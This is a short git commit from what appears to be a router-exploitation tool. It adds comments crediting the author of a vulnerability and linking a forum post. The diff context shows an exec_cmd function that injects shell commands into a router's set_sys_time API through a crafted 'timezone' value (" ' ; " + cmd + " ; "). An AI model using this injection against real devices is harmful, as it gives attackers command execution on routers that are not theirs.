connect: Update vulnerabilities and exploits info

This commit is contained in:
remittor
2025-01-30 10:09:08 +03:00
parent e34a3439c7
commit 27163b9b72
3 changed files with 13 additions and 0 deletions
+4
View File
@@ -46,6 +46,10 @@ stok = gw.web_login()
def exec_cmd(cmd, api = 'API/misystem/set_sys_time'):
######
# vuln/exploit author: remittor
# publication: https://forum.openwrt.org/t/125008/132
######
resp = gw.api_request(api, { 'timezone': " ' ; " + cmd + " ; " })
return resp